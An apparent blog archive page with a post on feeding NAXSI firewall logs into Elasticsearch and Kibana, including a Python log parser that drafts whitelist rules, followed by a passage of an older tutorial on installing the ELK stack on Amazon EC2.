<span style="font-family: "courier new" , "courier" , monospace; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"><b>Example Error logs:</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">2015/03/27 12:00:18 [error] 22909#0: *13840757 NAXSI_FMT: ip=ATTACKIP&server=www.yourcompany.com&uri=/&learning=1&vers=0.54&total_processed=22184&total_blocked=20&block=1&zone0=BODY&id0=16&var_name0=, client: ATTACKIP, server: www.youcompany.com, request: "POST /?t=12:00:17%20PM HTTP/1.1", host: "A.B.C.D"</span><br />
<span style="font-family: "courier new" , "courier" , monospace; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">2015/11/14 14:43:36 [error] 5182#0: *10 NAXSI_FMT: ip=X.X.X.X&server=Y.Y.Y.Y&uri=/some--file.html&learning=1&total_processed=10&total_blocked=6&zone0=URL&id0=1007&var_name0=&zone1=ARGS&id1=1007&var_name1=asd, client: X.X.X.X, server: localhost, request: "GET /some--file.html?asd=-- HTTP/1.1", host: "Y.Y.Y.Y"</span><br />
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"><br /></span>
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">Now that we have the log, we need to ingest it into our log system. The most important part of this process is indexing the components we will want to visualise later in Kibana. For us the crucial fields were the client IP (“ip”) and the “request” part of the log.</span><br />
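<span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">As an added example (not code from the post, nor from NAXSI or nxutil), the parser below turns NAXSI_FMT lines from error.log into records with the fields worth indexing (ip, request, uri, rule ids per match zone) and, for learning-mode entries, derives candidate BasicRule whitelist lines the way the whitelist step above describes. The sample log is constructed from the two example lines in the post; the mz: match-zone forms are taken from the NAXSI whitelist wiki linked above and are an assumption of this example.</span><br />

```python
import re
from urllib.parse import parse_qs

# Constructed sample: the two example lines from the post (placeholders kept)
# plus one non-NAXSI line, to show that unrelated error.log lines are skipped.
SAMPLE_LOG = """\
2015/03/27 12:00:18 [error] 22909#0: *13840757 NAXSI_FMT: ip=ATTACKIP&server=www.yourcompany.com&uri=/&learning=1&vers=0.54&total_processed=22184&total_blocked=20&block=1&zone0=BODY&id0=16&var_name0=, client: ATTACKIP, server: www.yourcompany.com, request: "POST /?t=12:00:17%20PM HTTP/1.1", host: "A.B.C.D"
2015/11/14 14:43:36 [error] 5182#0: *10 NAXSI_FMT: ip=X.X.X.X&server=Y.Y.Y.Y&uri=/some--file.html&learning=1&total_processed=10&total_blocked=6&zone0=URL&id0=1007&var_name0=&zone1=ARGS&id1=1007&var_name1=asd, client: X.X.X.X, server: localhost, request: "GET /some--file.html?asd=-- HTTP/1.1", host: "Y.Y.Y.Y"
2015/11/14 14:44:01 [notice] 5182#0: signal process started
"""

# Shape of one line: timestamp, [error], pid#tid, *connection, the NAXSI_FMT
# query string, then nginx's own client/server/request/host fields.
LINE_RE = re.compile(
    r'^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \[error\] \S+ \*\d+ '
    r'NAXSI_FMT: (?P<fmt>.+?), client: (?P<client>[^,]+), '
    r'server: (?P<server>[^,]+), request: "(?P<request>[^"]*)", '
    r'host: "(?P<host>[^"]*)"'
)


def parse_line(line):
    """Return a record for a NAXSI_FMT line, or None for any other error.log line."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    # NAXSI_FMT is a query string; keep_blank_values so that an empty
    # var_nameN (a zone-wide match) survives as '' instead of disappearing.
    fmt = {k: v[0] for k, v in parse_qs(m.group('fmt'), keep_blank_values=True).items()}
    matches = []
    i = 0
    while f'zone{i}' in fmt:  # zone0/id0/var_name0, zone1/id1/var_name1, ...
        matches.append({'zone': fmt[f'zone{i}'],
                        'id': int(fmt[f'id{i}']),
                        'var_name': fmt.get(f'var_name{i}', '')})
        i += 1
    return {
        'ts': m.group('ts'),
        'ip': fmt.get('ip'),                 # the field the post indexes as clientIP
        'server': fmt.get('server'),
        'uri': fmt.get('uri'),
        'learning': fmt.get('learning') == '1',
        'blocked': fmt.get('block') == '1',  # absent in learning mode entries
        'total_processed': int(fmt.get('total_processed', 0)),
        'total_blocked': int(fmt.get('total_blocked', 0)),
        'matches': matches,
        'client': m.group('client'),
        'request': m.group('request'),       # the other field the post indexes
        'host': m.group('host'),
    }


def parse_log(text):
    """Parse a whole error.log body, dropping lines that are not NAXSI_FMT."""
    return [ev for ev in (parse_line(l) for l in text.splitlines()) if ev]


def whitelist_candidates(events):
    """Derive BasicRule whitelist lines from learning-mode events only.

    Assumption: the mz: forms follow the NAXSI whitelist wiki. A candidate
    without a variable name whitelists the rule for a whole zone, which is
    coarse, so review each candidate before adding it to my_naxsi.rules.
    """
    rules = []
    for ev in events:
        if not ev['learning']:
            continue
        for mt in ev['matches']:
            zone, rid, var = mt['zone'], mt['id'], mt['var_name']
            if var:
                mz = f'${zone}_VAR:{var}'        # e.g. $ARGS_VAR:asd
            elif zone == 'URL':
                mz = f'$URL:{ev["uri"]}|URL'     # rule matched on the path itself
            else:
                mz = zone                        # whole zone, e.g. BODY
            rule = f'BasicRule wl:{rid} "mz:{mz}";'
            if rule not in rules:
                rules.append(rule)
    return rules


if __name__ == '__main__':
    events = parse_log(SAMPLE_LOG)
    for ev in events:
        print(ev['ts'], ev['ip'], ev['request'], [m['id'] for m in ev['matches']])
    print('\n'.join(whitelist_candidates(events)))
```

<span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">The records returned by parse_log are flat enough to ship to Elasticsearch as-is, with “ip” and “request” as top-level fields for the Kibana dashboard; the whitelist output is a starting point to compare against what nxutil produces, not a replacement for reviewing it.</span><br />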
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://lh5.googleusercontent.com/wkS-X6KIoAh_qKOAC7w6ajrN6DDdwSWnHy5Lmb1uqPtMAxAcEwzmWE3yXqvPM9a0Q-jDtiwzQGI4PbX9FeeZNOsI_ZSJ5bvElVBhMHjtxiifiXz8j3HGL9jVwVgD_u_w-aEDrha0" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Screen Shot 2016-04-16 at 11.59.29 AM.png" border="0" height="145" src="https://lh5.googleusercontent.com/wkS-X6KIoAh_qKOAC7w6ajrN6DDdwSWnHy5Lmb1uqPtMAxAcEwzmWE3yXqvPM9a0Q-jDtiwzQGI4PbX9FeeZNOsI_ZSJ5bvElVBhMHjtxiifiXz8j3HGL9jVwVgD_u_w-aEDrha0" style="border: none; transform: rotate(0rad);" width="624" /></a></div>
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;">Once your Kibana dashboard is up and ready, I recommend using ElastAlert </span><br />
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;">[</span><span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><a href="https://github.com/Yelp/elastalert">https://github.com/Yelp/elastalert</a></span></span><span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;">] to get the alerting you need for the attack IPs you are monitoring.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;">Here is a quick attack alert that was triggered:</span><br />
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvDFqibu5JZZxYKm6neE28Fmh-EfigsqGPV1VHlZy4vDnUOsIGweH64-tF2oogTGrDtJj370YrCmdZkwBxm_ocwPIk_uXsdnuyhnzZZTbL0RDxvEzKK6Rrl3cH8zdCbe61o3gf4_A91nU/s1600/Screen+Shot+2016-04-16+at+2.07.07+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvDFqibu5JZZxYKm6neE28Fmh-EfigsqGPV1VHlZy4vDnUOsIGweH64-tF2oogTGrDtJj370YrCmdZkwBxm_ocwPIk_uXsdnuyhnzZZTbL0RDxvEzKK6Rrl3cH8zdCbe61o3gf4_A91nU/s400/Screen+Shot+2016-04-16+at+2.07.07+PM.png" width="400" /></a></div>
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;"><br /></span></span></div>
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><b>Some References:</b></span></span></div>
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you are planning to implement NAXSI in your infrastructure, I recommend reading:</span></span></div>
<div style="text-align: left;">
<div style="text-align: left;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://github.com/nbs-system/naxsi" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "courier new"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/nbs-system/naxsi</span></a></div>
<a href="https://www.owasp.org/index.php/OWASP_NAXSI_Project" style="line-height: 1.38; text-decoration: none;"><span style="color: #1155cc; font-family: "courier new"; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.owasp.org/index.php/OWASP_NAXSI_Project</span></a><span id="docs-internal-guid-c144d0cf-1e4c-7165-df24-c51da4534662"></span></div>
</div>
<div style="text-align: left;">
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-decoration: none; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;"></span></span></div>
<div style="line-height: 1.38; text-decoration: none; text-indent: 36pt;">
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
</div>
</div>
</div>
Prajal Kulkarni, 2014-07-27: Installing ElasticSearch Logstash & Kibana #EKL #Logstash-forwader #COMBINEDAPACHELOG #AmazonEC2<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<div style="text-align: left;">
<span style="font-family: "verdana"; mso-bidi-font-family: Times;">It’s been a year since I last updated the blog, laziness wins any day! :P This blog entry will illustrate how to set up an out-of-the-box installation of EKL.</span><span style="font-family: "verdana";"> This setup was done on Amazon EC2 instances and will cover the following topics:</span></div>
</div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><b><br /></b></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><b> a) Setting up ElasticSearch</b></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><b> b) Setting up Logstash Server</b></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><b> c) Setting up Logstash-Forwarder</b></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><b> d) Setting up Kibana</b></span><br />
<span style="font-family: "verdana";"> </span><span style="font-family: "courier new" , "courier" , monospace;"><b>[Logstash 1.4.2, Kibana 3 and ElasticSearch 1.3]</b></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana";"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana"; mso-bidi-font-family: Times;">Below is a pictorial view of the setup I have up and running.</span><span style="font-family: "verdana";"> The final aim is to send Apache access logs from server [EC2_A] to server [EC2_B], create an Elastic cluster named (elasticsearch), and show the graphical representation in Kibana.</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana"; mso-bidi-font-family: Times;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: "verdana"; mso-bidi-font-family: Times;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; margin-left: 1em; margin-right: 1em;"></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcHX7JPPM6Pt36leAZnyrUHydXhGAuA55wG9z6_mFUwcg969-CU2F1GM5QkigyldWrQrnoKz9FulYlk_fHhITDDqdzoIQFy-MODU0Fp8vl7AnT0HWX5bsDInsA6Xfjl2otgH-6QFjK_qo/s1600/Screen+Shot+2014-07-27+at+6.49.09+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcHX7JPPM6Pt36leAZnyrUHydXhGAuA55wG9z6_mFUwcg969-CU2F1GM5QkigyldWrQrnoKz9FulYlk_fHhITDDqdzoIQFy-MODU0Fp8vl7AnT0HWX5bsDInsA6Xfjl2otgH-6QFjK_qo/s1600/Screen+Shot+2014-07-27+at+6.49.09+pm.png" width="640" /></a></div>
<span style="font-family: "verdana"; mso-bidi-font-family: Times;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana"; mso-bidi-font-family: Times;">Here the EC2_A server is our Logstash-forwarder/shipper. On EC2_B we have the Elastic cluster and the Logstash server running, and the UI is shown in Kibana.</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana";">There are many online resources we can refer to for the above setup. However, they are not in one single place; I had to search in multiple places to get the above setup running.</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana"; mso-bidi-font-family: Times;">Among the best resources I came across are the <a href="http://www.logstashbook.com/TheLogstashBook_sample.pdf" target="_blank">Logstash Cook Book</a> and the EKL installation guide by <a href="https://www.digitalocean.com/community/tutorials/how-to-use-logstash-and-kibana-to-centralize-and-visualize-logs-on-ubuntu-14-04" target="_blank">Digital Ocean</a>.</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana"; mso-bidi-font-family: Times;">Certainly, there were a lot of initial blockers I faced, but with this blog entry I hope one should not face any problems while installing.</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">Starters who are not familiar with EKL can read about these components here:
ElasticSearch (<a href="http://en.wikipedia.org/wiki/Elasticsearch"><span style="color: #0000e9;">http://en.wikipedia.org/wiki/Elasticsearch</span></a>),
Logstash (<a href="http://logstash.net/"><span style="color: #0000e9;">http://logstash.net/</span></a>),
Kibana (<a href="http://rashidkpc.github.io/Kibana/"><span style="color: #0000e9;">http://rashidkpc.github.io/Kibana/</span></a>).</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">Let’s
Start!<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">We will set up the <b>EC2_B </b>box first.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><b>EC2_B Config</b>:</span><span style="font-family: "courier new" , "courier" , monospace;"> (Micro instance) <span style="background-color: white; color: #444444; font-weight: bold; line-height: 18.200000762939453px;">Ubuntu Server 14.04_32bit: </span>Linux ip-192.168.2.2 3.13.0-29-generic #53-Ubuntu SMP Wed Jun 4 21:02:19 UTC 2014 i686 i686 i686 GNU/Linux</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b>Installing
Dependencies:</b></span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">(The only prerequisite required by Logstash is a Java runtime)</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier";"> </span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;">sudo add-apt-repository -y
ppa:webupd8team/java</span><span style="font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier";"> </span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;">sudo apt-get update</span><span style="font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier";"> </span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;">sudo apt-get -y install
oracle-java7-installer</span><span style="font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b><span style="color: #0e0e0e;">Now try:</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">java -version</span><span style="font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">java version "1.7.0_45"<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">Java(TM) SE Runtime Environment (build 1.7.0_45-b18)<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">Java HotSpot(TM) 64-Bit Server VM (build 24.45-b08, mixed mode)</span><span style="font-family: "courier";"><o:p></o:p></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b>Install Elastic Search:</b></span><span style="font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">curl -O <a href="https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-1.1.1.tar.gz"><span style="color: #0000e9;">https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-1.1.1.tar.gz</span></a><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">tar zxvf elasticsearch-1.1.1.tar.gz<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">cd elasticsearch-1.1.1/</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">./bin/elasticsearch & <b>--</b><span style="font-size: x-small;">This starts Elasticsearch in the background</span></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><b style="font-family: verdana, sans-serif;">Install Kibana:</b></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #0e0e0e;">cd ~; wget <a href="https://download.elasticsearch.org/kibana/kibana/kibana-3.0.1.tar.gz"><span style="color: #0000e9;">https://download.elasticsearch.org/kibana/kibana/kibana-3.0.1.tar.gz</span></a></span><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #0e0e0e;">tar xvf kibana-3.0.1.tar.gz</span></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="color: #0e0e0e;"><span style="font-family: "courier new" , "courier" , monospace;">sudo vi ~/kibana-3.0.1/config.js <b>--</b><span style="font-size: x-small;">Now change the elasticsearch port from 9200 to 80, so the line reads:</span></span></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #0e0e0e; mso-bidi-font-family: Courier;"> elasticsearch: "http://"+window.location.hostname+":80",</span></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #0e0e0e; mso-bidi-font-family: Courier;">sudo mkdir -p /var/www/kibana3</span><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #0e0e0e; mso-bidi-font-family: Courier;">sudo cp -R ~/kibana-3.0.1/* /var/www/kibana3/</span><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #0e0e0e; mso-bidi-font-family: Courier;"><br /></span></span>
<span style="color: #0e0e0e; font-family: "verdana" , sans-serif;"><b>Install nginx to host Kibana:</b></span><span style="font-family: "courier new" , "courier" , monospace;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace; mso-bidi-font-family: Courier;">sudo apt-get install nginx</span><span style="font-family: "courier"; mso-bidi-font-family: Courier;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$<span style="color: #0e0e0e;"> </span><span style="color: #0e0e0e;">cd ~; wget <a href="https://github.com/elasticsearch/kibana/raw/master/sample/nginx.conf"><span style="color: #0000e9;">https://github.com/elasticsearch/kibana/raw/master/sample/nginx.conf</span></a></span></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$<span style="color: #0e0e0e;"> </span><span style="color: #0e0e0e; mso-bidi-font-family: Courier;">vi nginx.conf <b>--</b><span style="font-size: x-small;">Now change the value of root as below</span></span></span><span style="font-family: "courier"; font-size: x-small; mso-bidi-font-family: Courier;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;"> root to /var/www/kibana3</span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;">;</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;">sudo service nginx restart</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">Now go to http://[IP]/kibana3 to check if Kibana UI is visible.</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier"; mso-bidi-font-family: Courier;"><br /></span>
<span style="font-family: "courier"; mso-bidi-font-family: Courier;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><b>Install Logstash:</b></span><span style="font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">curl -O <a href="https://download.elasticsearch.org/logstash/logstash/logstash-1.4.2.tar.gz"><span style="color: #0000e9;">https://download.elasticsearch.org/logstash/logstash/logstash-1.4.2.tar.gz</span></a><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="font-family: "courier new" , "courier" , monospace;">tar zxvf logstash-1.4.2.tar.gz</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;"><b>Now Generate the SSL Certificate:</b></span><span style="font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$</span><span style="color: #0e0e0e; font-family: "courier";"> </span><span style="color: #0e0e0e; font-family: "courier new" , "courier" , monospace;">sudo mkdir -p /etc/pki/tls/certs<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
